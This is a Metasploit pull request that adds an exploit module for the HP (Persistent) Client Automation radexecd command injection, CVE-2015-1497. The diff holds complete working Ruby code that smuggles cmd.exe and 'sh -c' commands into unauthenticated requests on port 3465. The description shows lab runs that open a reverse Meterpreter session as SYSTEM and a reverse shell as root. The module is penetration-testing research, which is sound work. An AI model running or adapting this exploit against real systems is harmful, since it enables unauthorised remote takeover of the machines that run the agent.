### PR TITLE
Add module for ZDI-15-038, Persistent (HP) Client Automation Command Injection RCE

### DIFF
--- a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
+++ b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
@@ -1,0 +1,126 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP Client Automation Command Injection',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability on HP Client Automation, distributed
+        actually as Persistent Systems Client Automation. The vulnerability exists in the Notify
+        Daemon (radexecd.exe), which doesn't authenticate execution requests by default neither.
+        This module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2
+        and CentOS 5.
+      },
+      'Author'         =>
+        [
+          'Ben Turner', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-1497'],
+          ['ZDI', '15-038'],
+          ['URL', 'https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features']
+        ],
+      'Privileged'     => true,
+      'Platform'       => %w{ unix win },
+      'DefaultOptions' =>
+        {
+            'WfsDelay' => 10
+        },
+      'Payload'        => {'DisableNops' => true},
+      'Targets'        =>
+        [
+          [ 'HP Client Automation 9.0.0 / Linux',
+            {
+              'Platform' => 'unix',
+              'Arch'     => ARCH_CMD,
+              'Payload'  =>
+                {
+                  'Space'       => 466,
+                  'EncoderType' => Msf::Encoder::Type::CmdUnixPerl,
+                  'Compat'      =>
+                    {
+                      'PayloadType' => 'cmd',
+                      'RequiredCmd' => 'openssl telnet generic gawk'
+                    },
+                  'BadChars' => "\x27"
+                }
+            }
+          ],
+          [ 'HP Client Automation 9.0.0 / Windows',
+            {
+              'Platform' => 'win',
+              'Arch'     => ARCH_X86
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 02 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(3465)
+      ], self.class)
+
+    deregister_options('CMDSTAGER::FLAVOR')
+    deregister_options('CMDSTAGER::DECODER')
+  end
+
+  def check
+    connect
+    sock.put("\x00") # port
+    sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID
+    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
+    sock.put("hide\x00") # command
+    data = sock.get_once
+    disconnect
+
+    if data && data.unpack('C')[0] == 0
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    case target['Platform']
+    when 'win'
+      print_status('Exploiting Windows target...')
+      execute_cmdstager({:flavor => :vbs, :linemax => 290, :delay => 0.75})
+    when 'unix'
+      print_status('Exploiting Linux target...')
+      exploit_unix
+    else
+      fail_with(Failure::NoTarget, 'Invalid target')
+    end
+  end
+
+  def exploit_unix
+    connect
+    sock.put("\x00") # port
+    sock.put("0\x00") # user ID
+    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
+    sock.put("hide hide\x09sh -c '#{payload.encoded.gsub(/\\/, "\\\\\\\\")}'\x00") # command, here commands can be injected
+    disconnect
+  end
+
+  def execute_command(cmd, opts = {})
+    connect
+    sock.put("\x00") # port
+    sock.put("S-1-5-18\x00") # user ID
+    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
+    sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
+    disconnect
+  end
+end

--- a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
+++ b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
@@ -83,10 +83,10 @@ class Metasploit3 < Msf::Exploit::Remote
     sock.put("#{rand_text_alphanumeric(4 + rand(3))}\x00") # user ID
     sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
     sock.put("hide\x00") # command
-    data = sock.get_once
+    res = sock.get_once
     disconnect
 
-    if data && data.unpack('C')[0] == 0
+    if res && res.unpack('C')[0] == 0
       return Exploit::CheckCode::Detected
     end
 
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
     case target['Platform']
     when 'win'
       print_status('Exploiting Windows target...')
-      execute_cmdstager({:flavor => :vbs, :linemax => 290, :delay => 0.75})
+      execute_cmdstager({:flavor => :vbs, :linemax => 290})
     when 'unix'
       print_status('Exploiting Linux target...')
       exploit_unix
@@ -121,6 +121,10 @@ class Metasploit3 < Msf::Exploit::Remote
     sock.put("S-1-5-18\x00") # user ID
     sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
     sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
+    res = sock.get_once
     disconnect
+    unless res && res.unpack('C')[0] == 0
+      fail_with(Failure::Unknown, "Something failed executing the stager...")
+    end
   end
 end


### PR DESCRIPTION
Tested on:
- Win 7 SP1 (32 bits) with HPCA agent 9.00 for Windows
- Centos 5 (64 bits) with HPCA agent 9.00 for Linux
## Verification
- [x] Download HPCA 9.00 Enterprise trial from http://www8.hp.com/us/en/software-solutions/client-automation-management-software/ 
- [x] Review the installation documentation available on the Doc folder of the trial ISO (I cannot explain the installation steps better than the official really)
- [x] First of all Install an HPCA Core Server on a Windows 2003 SP2 server (maybe you can just install the agents, I've not tried to install them without a Core server)
## Exploit Windows target
- [x] Install an HPCA Windows Agent on a Windows 7 SP1 machine
- [x] Start the console and use the module on this pull request

```
msf > use exploit/multi/misc/persistent_hpca_radexec_exec
msf exploit(persistent_hpca_radexec_exec) >
```
- [x] Set the target and options

```
msf exploit(persistent_hpca_radexec_exec) > set TARGET 1
TARGET => 1
msf exploit(persistent_hpca_radexec_exec) > set RHOST 172.16.158.132
RHOST => 172.16.158.132
```
- [x] Check, verify it finds the service

```
msf exploit(persistent_hpca_radexec_exec) > check
[*] 172.16.158.132:3465 - The target service is running, but could not be validated.
```
- [x] Set the payload, Exploit,verify which you get a session

```
msf exploit(persistent_hpca_radexec_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Exploiting Windows target...
[*] Command Stager progress -   0.26% done (289/109237 bytes)
[*] Command Stager progress -   0.53% done (578/109237 bytes)
[*] Command Stager progress -   0.79% done (867/109237 bytes)
[*] Command Stager progress -   1.06% done (1156/109237 bytes)
[*] Command Stager progress -   1.32% done (1445/109237 bytes)
[*] Command Stager progress -   1.59% done (1734/109237 bytes)
[*] Command Stager progress -   1.85% done (2023/109237 bytes)

[*] Command Stager progress -  99.68% done (108882/109237 bytes)
[*] Command Stager progress -  99.93% done (109158/109237 bytes)
[*] Command Stager progress - 100.00% done (109237/109237 bytes)
[*] Sending stage (770048 bytes) to 172.16.158.132
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.132:49166) at 2015-02-20 01:01:46 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
```
## Exploit linux target
- [x] Install an HPCA Linux Agent on a CentOS 5 (64 bits) machine
- [x] Start the console and use the module on this pull request

```
msf > use exploit/multi/misc/persistent_hpca_radexec_exec
msf exploit(persistent_hpca_radexec_exec) >
```
- [x] Set the target and options

```
msf exploit(persistent_hpca_radexec_exec) > set target 0
target => 0
msf exploit(persistent_hpca_radexec_exec) > set rhost 172.16.158.133
rhost => 172.16.158.133
```
- [x] Check, verify it finds the service

```
msf exploit(persistent_hpca_radexec_exec) > check
[*] 172.16.158.133:3465 - The target service is running, but could not be validated.
```
- [x] Set the payload, Exploit,verify which you get a session

```
msf exploit(persistent_hpca_radexec_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(persistent_hpca_radexec_exec) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(persistent_hpca_radexec_exec) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[*] Exploiting Linux target...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8UJxoZHHsO08NDtE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8UJxoZHHsO08NDtE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (172.16.158.1:4444 -> 172.16.158.133:41659) at 2015-02-20 01:06:25 -0600

id
uid=0(root) gid=0(root)
^C
Abort session 3? [y/N]  y

[*] 172.16.158.133 - Command shell session 3 closed.  Reason: User exit
```
